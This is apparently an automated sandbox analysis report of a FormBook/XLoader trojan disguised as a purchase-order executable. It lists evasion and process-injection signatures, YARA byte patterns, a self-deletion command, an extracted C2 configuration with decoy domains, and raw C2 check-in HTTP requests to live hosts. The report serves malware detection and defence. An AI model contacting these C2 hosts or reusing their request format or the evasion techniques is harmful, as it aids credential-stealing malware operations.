Windows Analysis Report
PO-INQUIRY-VALE-SP-2022-60.exe

Overview

General Information

Sample Name: PO-INQUIRY-VALE-SP-2022-60.exe
Analysis ID: 633628
MD5: 86dd400e33efa12ea4cbac3d29000e41
SHA1: d2ca57eb8122a98cd03daf63532e9717f362f808
SHA256: 6ccee842a4957d3410ae6163bb96a9b7739b3ffc3032dfeeb2a3c7b273ca5656
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • PO-INQUIRY-VALE-SP-2022-60.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe" MD5: 86DD400E33EFA12EA4CBAC3D29000E41)
    • PO-INQUIRY-VALE-SP-2022-60.exe (PID: 4240 cmdline: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe MD5: 86DD400E33EFA12EA4CBAC3D29000E41)
      • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4604 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3488 cmdline: /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Source | Rule | Description | Author | Strings
00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x4b75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x4c77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x4def:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x389c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa127:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xb22a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x6fa9:$sqlite3step: 68 34 1C 7B E1
    • 0x70bc:$sqlite3step: 68 34 1C 7B E1
    • 0x6fd8:$sqlite3text: 68 38 2A 90 C5
    • 0x70fd:$sqlite3text: 68 38 2A 90 C5
    • 0x6feb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x7113:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x4b75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x4c77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x4def:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x389c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa127:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb22a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
      • 0x4f6fb:$s1: file:///
      • 0x4f60b:$s2: {11111-22222-10009-11112}
      • 0x4f68b:$s3: {11111-22222-50001-00000}
      • 0x4ca49:$s4: get_Module
      • 0x4ce8f:$s5: Reverse
      • 0x4ef3a:$s6: BlockCopy
      • 0x4ed7e:$s7: ReadByte
      • 0x4f70d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.raw.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
      • 0x514fb:$s1: file:///
      • 0xd6f1b:$s1: file:///
      • 0x5140b:$s2: {11111-22222-10009-11112}
      • 0xd6e2b:$s2: {11111-22222-10009-11112}
      • 0x5148b:$s3: {11111-22222-50001-00000}
      • 0xd6eab:$s3: {11111-22222-50001-00000}
      • 0x4e849:$s4: get_Module
      • 0xd4269:$s4: get_Module
      • 0x4ec8f:$s5: Reverse
      • 0xd46af:$s5: Reverse
      • 0x50d3a:$s6: BlockCopy
      • 0xd675a:$s6: BlockCopy
      • 0x50b7e:$s7: ReadByte
      • 0xd659e:$s7: ReadByte
      • 0x5150d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      • 0xd6f2d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8a48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8de2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14b75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14c77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14def:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x97ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1389c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa562:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a127:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b22a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16fa9:$sqlite3step: 68 34 1C 7B E1
        • 0x170bc:$sqlite3step: 68 34 1C 7B E1
        • 0x16fd8:$sqlite3text: 68 38 2A 90 C5
        • 0x170fd:$sqlite3text: 68 38 2A 90 C5
        • 0x16feb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17113:$sqlite3blob: 68 53 D8 7F 8C
        No Sigma rule has matched


        AV Detection

        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.jupiter-directory.info/j86w/"], "decoy": ["popcornpor.xyz", "expoj3.com", "lespiecesmp.com", "kinuami.net", "cecil72.com", "lingmao08.com", "peliculasa.com", "medicaleducationbangladesh.com", "consultellation.com", "theminercrypto.com", "cstingche.com", "pieprop.com", "iguaym.com", "smartveranda.com", "tarpeyceramics.com", "gsibralstar1.com", "b8ceex.com", "qctxcyagmn.com", "utg-kr.com", "funserve.club", "trustedhomebuying.com", "thebrahmaspace.com", "tsreaur.com", "carmelkp.com", "maxitechtnpasumo2.xyz", "cmby84tvd.com", "creativequickwins.com", "psn10.com", "cherejeanne.com", "interiorsbe.com", "maxmaggi.com", "the-ali.com", "austereslocpc.xyz", "sharecoin.community", "vintagekendall.com", "blackoutgenerator.com", "realestatecareeratru.com", "faithac.com", "medyumagah.xyz", "cdn-azureedge.services", "chefspiceshop.com", "dachenxuetang.com", "route112mitsubishi.com", "pzhftjt.com", "famelink.biz", "5921933.com", "maridza.art", "hwy-study.xyz", "deta-hedman.com", "danilhodoekhi.com", "shibecha.info", "germesmed.store", "dzvfk.com", "burntkeroseneblueheelers.com", "online-careers.com", "hucosii.xyz", "pointconstructionservices.com", "shantellonlineshoph.com", "matterofnature.com", "cremboo.space", "jamiebakes.net", "ww2pdf.biz", "heiboard.xyz", "pixelkoncept.com"]}
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, ReversingLabs: Detection: 17%
        Source: http://www.shantellonlineshoph.com/j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT, Avira URL Cloud: Label: malware
        Source: http://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh, Avira URL Cloud: Label: phishing
        Source: www.jupiter-directory.info/j86w/, Avira URL Cloud: Label: malware
        Source: http://www.popcornpor.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm, Avira URL Cloud: Label: phishing
        Source: http://www.burntkeroseneblueheelers.com/j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh, Avira URL Cloud: Label: malware
        Source: http://www.jupiter-directory.info/j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT, Avira URL Cloud: Label: malware
        Source: http://www.popcornpor.xyz/j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT, Avira URL Cloud: Label: phishing
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, Joe Sandbox ML: detected
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe, Code function: 4x nop then pop edi, 4_2_00415B3E
        Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop edi, 10_2_025C5B3E

        Networking

        Source: C:\Windows\explorer.exe, Network Connect: 209.141.38.71 80
        Source: C:\Windows\explorer.exe, Domain query: www.iguaym.com
        Source: C:\Windows\explorer.exe, Domain query: www.jupiter-directory.info
        Source: C:\Windows\explorer.exe, Domain query: www.jamiebakes.net
        Source: C:\Windows\explorer.exe, Domain query: www.burntkeroseneblueheelers.com
        Source: C:\Windows\explorer.exe, Domain query: www.lingmao08.com
        Source: C:\Windows\explorer.exe, Network Connect: 15.197.142.173 80
        Source: C:\Windows\explorer.exe, Network Connect: 217.160.0.206 80
        Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
        Source: C:\Windows\explorer.exe, Domain query: www.gsibralstar1.com
        Source: C:\Windows\explorer.exe, Domain query: www.popcornpor.xyz
        Source: C:\Windows\explorer.exe, Network Connect: 172.67.219.19 80
        Source: C:\Windows\explorer.exe, Domain query: www.route112mitsubishi.com
        Source: C:\Windows\explorer.exe, Network Connect: 81.171.22.6 80
        Source: C:\Windows\explorer.exe, Domain query: www.tsreaur.com
        Source: C:\Windows\explorer.exe, Network Connect: 156.226.250.150 80
        Source: C:\Windows\explorer.exe, Domain query: www.danilhodoekhi.com
        Source: C:\Windows\explorer.exe, Domain query: www.medicaleducationbangladesh.com
        Source: C:\Windows\explorer.exe, Network Connect: 165.231.150.75 80
        Source: C:\Windows\explorer.exe, Domain query: www.heiboard.xyz
        Source: C:\Windows\explorer.exe, Network Connect: 38.143.25.232 80
        Source: C:\Windows\explorer.exe, Domain query: www.expoj3.com
        Source: C:\Windows\explorer.exe, Network Connect: 198.54.117.217 80
        Source: C:\Windows\explorer.exe, Network Connect: 198.54.117.218 80
        Source: C:\Windows\explorer.exe, Domain query: www.shantellonlineshoph.com
        Source: C:\Windows\explorer.exe, Domain query: www.funserve.club
        Source: C:\Windows\explorer.exe, Domain query: www.pieprop.com
        Source: C:\Windows\explorer.exe, Domain query: www.theminercrypto.com
        Source: C:\Windows\explorer.exe, Domain query: www.deta-hedman.com
        Source: C:\Windows\explorer.exe, Network Connect: 37.97.135.188 80
        Source: C:\Windows\explorer.exe, Domain query: www.trustedhomebuying.com
        Source: C:\Windows\explorer.exe, Network Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exe, Network Connect: 104.16.100.51 80
        Source: C:\Windows\explorer.exe, Network Connect: 104.21.27.132 80
        Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exe, Network Connect: 198.54.117.210 80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 37.97.135.188:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 37.97.135.188:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 37.97.135.188:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 165.231.150.75:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 165.231.150.75:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 165.231.150.75:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49796 -> 156.226.250.150:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49796 -> 156.226.250.150:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49796 -> 156.226.250.150:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 209.141.38.71:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 209.141.38.71:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 209.141.38.71:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49805 -> 38.143.25.232:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49805 -> 38.143.25.232:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49805 -> 38.143.25.232:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.27.132:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.27.132:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49811 -> 104.21.27.132:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49813 -> 198.54.117.217:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49813 -> 198.54.117.217:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49813 -> 198.54.117.217:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49815 -> 172.67.219.19:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49815 -> 172.67.219.19:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49815 -> 172.67.219.19:80
        Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49817 -> 217.160.0.206:80
        Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49817 -> 217.160.0.206:80
        Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49817 -> 217.160.0.206:80
        Source: C:\Windows\explorer.exe, DNS query: www.heiboard.xyz
        Source: C:\Windows\explorer.exe, DNS query: www.popcornpor.xyz
        Source: Malware configuration extractor, URLs: www.jupiter-directory.info/j86w/
        Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.deta-hedman.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.shantellonlineshoph.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.heiboard.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.tsreaur.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.iguaym.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.funserve.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.popcornpor.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.expoj3.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.danilhodoekhi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.pieprop.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.jamiebakes.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.trustedhomebuying.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.jupiter-directory.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfT HTTP/1.1 Host: www.route112mitsubishi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm HTTP/1.1 Host: www.popcornpor.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT HTTP/1.1 Host: www.heiboard.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh HTTP/1.1 Host: www.burntkeroseneblueheelers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptoj HTTP/1.1 Host: www.medicaleducationbangladesh.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh HTTP/1.1 Host: www.lingmao08.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R HTTP/1.1 Host: www.jamiebakes.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global traffic HTTP traffic detected: GET /j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh HTTP/1.1 Host: www.theminercrypto.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox View IP Address: 198.54.117.217 198.54.117.217
